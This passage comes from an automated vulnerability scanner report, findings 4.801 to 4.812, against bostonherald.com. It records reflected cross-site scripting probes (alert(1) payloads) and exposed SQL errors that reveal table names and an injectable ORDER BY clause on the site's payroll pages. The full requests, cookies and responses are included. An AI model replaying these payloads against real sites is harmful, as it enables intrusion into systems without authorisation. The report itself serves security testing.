Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312665&format=emailff39a'-alert(1)-'96f43005832'.toQueryParams();

       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //----------------------------
...[SNIP]...

4.801. http://www.bostonherald.com/news/regional/view.bg [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf1d'-alert(1)-'71a4876b0f9 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/regional/view.bg?articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9'.toQueryParams();

       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //----------------------------
...[SNIP]...

4.802. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4bca(a)57e0d5026f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /projects/payroll/cambridge/?f4bca(a)57e0d5026f9=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 502
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?f4bca(a)57e0d5026f9=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4bca(a)57e0d5026f9=1 LIMIT 0,20' at line
...[SNIP]...

4.803. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c00b'-alert(1)-'f86646641f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /projects/payroll/cambridge/?5c00b'-alert(1)-'f86646641f6=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 529
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.804. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f0b5'-alert(1)-'a16c453c05d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /projects/payroll/mass_pike/?4f0b5'-alert(1)-'a16c453c05d=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 397
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.805. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c260f(a)d58a654d6ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /projects/payroll/mass_pike/?c260f(a)d58a654d6ed=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 370
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?c260f(a)d58a654d6ed=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?c260f(a)d58a654d6ed=1 LIMIT 0,20' at line
...[SNIP]...

4.806. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quasi_state/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6c960(a)77d7148e6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /projects/payroll/quasi_state/?6c960(a)77d7148e6d8=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 540
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?6c960(a)77d7148e6d8=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?6c960(a)77d7148e6d8=1 LIMIT 0,20' at line
...[SNIP]...

4.807. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb58b(a)bc791e733d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /projects/payroll/quincy/?eb58b(a)bc791e733d=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 365
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?eb58b(a)bc791e733d=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?eb58b(a)bc791e733d=1 LIMIT 0,20' at line 1
...[SNIP]...

4.808. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b364'-alert(1)-'a0ab3d5c958 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /projects/payroll/quincy/?4b364'-alert(1)-'a0ab3d5c958=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 395
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.809. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a52a7'-alert(1)-'3fe2c2f08cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /projects/payroll/suffolk/?a52a7'-alert(1)-'3fe2c2f08cd=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 397
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.810. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48b0d(a)6246e4e221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /projects/payroll/suffolk/?48b0d(a)6246e4e221=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 367
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?48b0d(a)6246e4e221=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?48b0d(a)6246e4e221=1 LIMIT 0,20' at line 1
...[SNIP]...

4.811. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29cc'-alert(1)-'a2f2f71b2c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /projects/payroll/worcester/?e29cc'-alert(1)-'a2f2f71b2c7=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 401
Content-Type: text/html; charset=UTF-8
Connection: close

SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.812. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4ac7(a)0dc08ce248a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

